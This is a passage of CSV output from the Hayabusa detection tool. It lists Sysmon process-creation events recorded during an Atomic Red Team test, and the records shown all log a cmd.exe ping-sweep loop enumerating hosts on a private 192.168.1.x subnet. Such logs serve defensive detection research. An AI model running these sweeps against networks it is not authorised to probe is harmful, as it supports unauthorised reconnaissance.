747F3D96-D915-5D31-0000-001002C53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:06.019 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.63 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D916-5D31-0000-0010ECC73400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:06.440 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.64 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D916-5D31-0000-0010B1D03400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:07.053 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.65 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5468 | PGUID: 747F3D96-D917-5D31-0000-00109BD33400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:07.413 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.66 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4052 | PGUID: 747F3D96-D917-5D31-0000-001085D63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:08.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.67 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6220 | PGUID: 747F3D96-D918-5D31-0000-00106FD93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:08.500 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.68 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-D918-5D31-0000-001059DC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:09.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.69 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 976 | PGUID: 747F3D96-D919-5D31-0000-00109EDF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:09.474 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.70 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 396 | PGUID: 747F3D96-D919-5D31-0000-001088E23400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:10.014 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.71 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1200 | PGUID: 747F3D96-D91A-5D31-0000-001072E53400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:10.522 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.72 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4664 | PGUID: 747F3D96-D91A-5D31-0000-00105CE83400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:11.031 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.73 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2804 | PGUID: 747F3D96-D91B-5D31-0000-001046EB3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:11.504 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
ping -n 1 -w 100 192.168.1.74 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D91B-5D31-0000-00100BF43400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:12.023 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.75 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6080 | PGUID: 747F3D96-D91C-5D31-0000-0010F5F63400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:12.547 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.76 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6308 | PGUID: 747F3D96-D91C-5D31-0000-0010DFF93400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:13.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.77 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5692 | PGUID: 
747F3D96-D91D-5D31-0000-0010CAFC3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:13.489 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.78 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4092 | PGUID: 747F3D96-D91D-5D31-0000-0010B7FF3400",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:14.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.79 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6516 | PGUID: 747F3D96-D91E-5D31-0000-0010A1023500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:14.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.80 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D91E-5D31-0000-00108E053500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:15.051 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.81 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3164 | PGUID: 747F3D96-D91F-5D31-0000-001079083500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:15.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.82 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D91F-5D31-0000-0010640B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:16.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.83 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2288 | PGUID: 747F3D96-D920-5D31-0000-00104E0E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:16.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.84 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1684 | PGUID: 747F3D96-D920-5D31-0000-0010A6183500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:17.041 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.85 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1060 | PGUID: 747F3D96-D921-5D31-0000-0010921B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:17.511 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.86 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3744 | PGUID: 747F3D96-D921-5D31-0000-00107C1E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.015 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.87 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D922-5D31-0000-001066213500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.509 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.88 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D922-5D31-0000-001063243500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:18.990 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: 
ping -n 1 -w 100 192.168.1.89 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D922-5D31-0000-001053273500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:19.541 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.90 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 747F3D96-D923-5D31-0000-00103D2A3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:20.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.91 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D924-5D31-0000-0010272D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:20.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.92 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 
747F3D96-D924-5D31-0000-001024303500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:21.036 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.93 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D925-5D31-0000-00106C3C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:21.488 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.94 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5852 | PGUID: 747F3D96-D925-5D31-0000-0010563F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:22.030 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.95 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D926-5D31-0000-00101B483500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:22.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.96 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D926-5D31-0000-0010074B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:23.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.97 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D927-5D31-0000-0010F24D3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:23.534 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.98 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D927-5D31-0000-0010DC503500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:24.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.99 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3680 | PGUID: 747F3D96-D928-5D31-0000-0010C7533500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:24.521 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.100 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D928-5D31-0000-0010B1563500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:25.035 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.101 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7152 | PGUID: 747F3D96-D929-5D31-0000-00109D593500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:25.529 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.102 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D929-5D31-0000-00108A5C3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:26.007 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.103 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D929-5D31-0000-0010765F3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:26.534 +09:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.104 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3700 | PGUID: 747F3D96-D92A-5D31-0000-001062623500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:27.040 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.105 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2852 | PGUID: 747F3D96-D92B-5D31-0000-0010296B3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:27.493 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.106 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6484 | PGUID: 747F3D96-D92B-5D31-0000-00108D6E3500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:52:28.017 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.107 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5400 | PGUID: 
747F3D96-D92C-5D31-0000-00107A713500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
